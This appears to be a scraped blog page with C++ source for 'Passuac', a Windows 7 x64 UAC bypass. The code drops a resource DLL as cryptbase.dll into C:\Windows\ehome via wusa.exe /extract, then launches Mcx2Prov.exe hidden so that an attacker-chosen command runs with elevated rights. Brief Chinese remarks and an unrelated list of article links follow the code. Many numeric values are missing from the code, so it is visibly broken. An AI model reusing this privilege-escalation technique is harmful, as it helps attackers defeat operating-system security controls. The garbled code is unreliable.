// Passuac.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

#include <Windows.h>

#include <stdio.h>

#include  <direct.h>

BOOL IsUserInAdminGroup() //判断是否在管理员组

{

    BOOL fInAdminGroup = FALSE;

    HANDLE hToken = NULL;

    HANDLE hTokenToCheck = NULL;

    DWORD cbSize = ;

    OSVERSIONINFO osver = {};

    osver.dwOSVersionInfoSize = sizeof(osver);

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken))

        goto Cleanup;

    if (!GetVersionEx(&osver))

        goto Cleanup;

    if (osver.dwMajorVersion >= )

    {

        TOKEN_ELEVATION_TYPE elevType;

        if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize))

            goto Cleanup;

        if (TokenElevationTypeLimited == elevType)

        {

            if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize))

                goto Cleanup;

        }

    }

    if (!hTokenToCheck)

    {

        if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck))

            goto Cleanup;

    }

    BYTE adminSID[SECURITY_MAX_SID_SIZE];

    cbSize = sizeof(adminSID);

    if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize))

        goto Cleanup;

    if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup))

        goto Cleanup;

Cleanup:

    if (hToken)    CloseHandle(hToken);

    if (hTokenToCheck) CloseHandle(hTokenToCheck);

    return fInAdminGroup;

}

BOOL IsRunAsAdmin() //判断是否以管理员权限运行

{

    BOOL fIsRunAsAdmin = FALSE;

    DWORD dwError = ERROR_SUCCESS;

    PSID pAdministratorsGroup = NULL;

    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;

    if (!AllocateAndInitializeSid(

        &NtAuthority,

        ,

        SECURITY_BUILTIN_DOMAIN_RID,

        DOMAIN_ALIAS_RID_ADMINS,

        , , , , , ,

        &pAdministratorsGroup))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

    if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))

    {

        dwError = GetLastError();

        goto Cleanup;

    }

Cleanup:

    if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);

    return fIsRunAsAdmin;

}

BOOL writedll64()

{

    char Szpath[MAX_PATH] = {};

    char uacexqute[] = {};

    DWORD   dwWrite=;

    WORD wResID;

    HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

    if (hFile == INVALID_HANDLE_VALUE)

    {

        printf("Getlasterror:%d.\r\n",GetLastError());

        return ;

    }

    HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");

    HGLOBAL hG = LoadResource(NULL, hrsc);

    DWORD   dwSize = SizeofResource( NULL,  hrsc); 

    WriteFile(hFile,hG,dwSize,&dwWrite,NULL);

    CloseHandle( hFile );

    getcwd(Szpath, MAX_PATH);

    strcat(Szpath,"\\cryptbase.tmp");

    system("makecab cryptbase.dll cryptbase.tmp");

    sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

    ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

    //remove("cryptbase*");

    DeleteFileA("cryptbase.dll");

    DeleteFileA("cryptbase.tmp");

    return true;

}

int main(int argc,char* argv[])

{

    FILE* fp;

    char szcmd[] = {};

    char *Options;

    char buffer[] = {};

    STARTUPINFO si={sizeof(si)};

    PROCESS_INFORMATION pi;

    si.dwFlags=STARTF_USESHOWWINDOW;

    si.wShowWindow=TRUE;

    if (argc < )

    {

        printf("[*]:%s Passuac for windows 7 x64\n",argv[]);

        printf("[*]:%s Setp1: passuac\r\n",argv[]);

        printf("[*]:%s Setp2: shell_cmd\r\n",argv[]);

        printf("[*]:Welcome to www.90sec.org\r\n");

        printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");

        return ;

    }

    strcpy(szcmd,argv[]);

    char szNewCmd[MAX_PATH] = {};

    wsprintfA(szNewCmd, "\"%s\"", szcmd);

    if (!IsUserInAdminGroup())

    {

        printf("Your not have in Local Administrator Group\r\n");

        printf("Program exit;");

        exit();

    }else

    {

        printf("Your have in Local Administrator Group\r\n");

        printf("PassUac ing.....\r\n");

        if (!IsRunAsAdmin())

        {

            if (!strcmp(szcmd,"passuac"))

            {

                writedll64();

            }else

            {

                ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);

                Sleep();

                fp = fopen("c:\\programdata\\uac.txt","rb");

                if (fp == NULL)

                {

                    printf("Getlasterror:%d\r\n",GetLastError());

                    return ;

                }

                ZeroMemory(buffer,sizeof(buffer));

                while (fgets(buffer,sizeof(buffer),fp))

                {

                    printf(buffer);

                }

                fclose(fp);

            }

        }

    }

    return ;

}

需要自己写个DLL,来进行参数解析。请看代码把。

代码写的相当烂,但是能够达到地步,还请各位莫笑话。

WIN7 X64 PASSUAC 源码的更多相关文章

  1. tesseract4.0:win10 +x64+vs2015 源码安装(ViewerDebugging)安装记录

    参考文章: https://blog.csdn.net/u013985291/article/details/78295789 https://blog.csdn.net/u013985291/art ...

  2. 16Aspx.com源码2014年7月详细

            Web电子商务网(三层)V2.0源码 2014-07-31   [VS2010] 源码介绍: Web电子商务网(三层)V2.0源码 源码描述: 一.源码特点     采用三层架构开发, ...

  3. win7 x64 +vs2015 + cmake3.10.3编译opencv-3.4.1+opencv_contrib-3.4.1源码,并进行配置

    简介: 一直以来都是在ubuntu下使用opencv,最近因为有<图像处理与模式识别>这门课,需要使用vs2015+opencv提交课程作业,因为opencv官方编译好的exe没有cont ...

  4. qt4.8.7 源码在win7+vs2010环境的x64编译(qt 64位)

    由于qt官网上,没有直接提供x64的安装包,但由于项目需要x64的qt,所以,小编不得不下载qt的源码,经历了一次长达约4个小时的编译过程.今年国庆7天,就遭这事上了,哈哈~~~ 几个下载链接: qt ...

  5. 谷歌开源项目Chromium的源码获取与项目构建(Win7+vs10/vs13)

    转自:http://blog.csdn.net/kuerjinjin/article/details/23563059 从12年那会儿开始获取源码和构建chromium项目都是按照那时候的官方要求用w ...

  6. mpusher 源码编译 for windows X64

    mpusher 源码编译 for windows X64 对于java我是小白,通过一步步的摸索,将经验总结下来,给更多码友提供入门的帮助.一个人的摸索是很困难的,本教程感谢 [MPush开源消息推送 ...

  7. Windows 10 x64 下编译 Hadoop 源码

    Windows 10 x64 下编译 Hadoop 源码 环境准备 Hadoop并没有提供官方的 Windows 10 下的安装包,所以需要自己手动来编译,官方文档中 BUILDING.txt 文件中 ...

  8. QGIS(2.18.15 源码)+Qt(5/5.9.3)+VS2015(X64)编译

    由于工作要求,今年需要基于Qt搞跨平台的GIS.前期未曾接触过Qt,最近也简单学习了下,开源的QGIS是非常不错的学习资源,下了最新版的QGIS源码,不过在VS2015下却没法直接打开.网上查了很多资 ...

  9. 32位win7+vs2008编译mysql 5.6.22源码并安装

    以下这部分安装说明是来自http://www.2cto.com/database/201407/316681.html的win7+vs2010源码编译mysql,文章最后会说明用vs2008编译遇见的 ...

随机推荐

  1. EasyNVR摄像机无插件直播按需RTSP拉流播放流程详解

    1.背景需求 有许多客户现场,有许多设备但是不需要一直向设备端取视频流,因为在用户不观看的情况下,还在获取视频资源,一方面大大的浪费了网络带宽资源,一方面对设备服务器要求也较高,用户成本就要提高,这是 ...

  2. 《UNIX网络编程》 -- 第五章

    str_cli 和 str_echo 函数 需要先弄清楚 3.9 readn.writen 和 readline 函数 str_cli void str_cli(FILE *fp, int sockf ...

  3. Python操作Redis(二)

    List操作 redis中的List在在内存中按照一个name对应一个List来存储.如图: lpush(name,values) # 在name对应的list中添加元素,每个新的元素都添加到列表的最 ...

  4. 我的Android进阶之旅------>Android利用温度传感器实现带动画效果的电子温度计

    要想实现带动画效果的电子温度计,需要以下几个知识点: 1.温度传感器相关知识. 2.ScaleAnimation动画相关知识,来进行水印刻度的缩放效果. 3.android:layout_weight ...

  5. 洗牌算法Fisher-Yates以及C语言随机数的产生

    前些天在蘑菇街的面试中碰到一道洗牌的算法题,拿出来和大家分享一下! 原题是:54张有序的牌,如何无序的发给3个人? 这个题是运用经典的洗牌算法完成.首先介绍一种经典的洗牌算法--Fisher-Yate ...

  6. nginx基础系列

    centos中搭建nginx环境 nginx开机启动 nginx配置文件说明 nginx负载均衡配置 nginx upstream模块 nginx配置ssl nginx日志切割 nginx平滑升级

  7. 指定Python线程数目

    可以通过threading.semaphore()来指定并行运行的Python线程的数目. #!/usr/bin/python2.7 #File: threadsNum.py #Author: lxw ...

  8. 20160422 --Switch…case 总结; 递归算法

    13 2016-04-22  11:01:00 Switch…case 总结(网摘) 例题: Console.WriteLine("1.汉堡包"); Console.WriteLi ...

  9. Web前端开发人员和设计师必读文章推荐【系列十】

    <Web前端开发人员和设计师必读文章推荐系列十>给大家带来最近两个月发布在<梦想天空>的优秀文章,特别推荐给 Web 开发人员和设计师阅读.梦天空博客关注 前端开发 技术,展示 ...

  10. 每天一个Linux命令(42)watch命令

        watch命令以周期性的方式执行给定的指令,指令输出以全屏方式显示.     (1)用法:     用法:  watch  [参数]  [命令]       (2)功能:     功能:  可 ...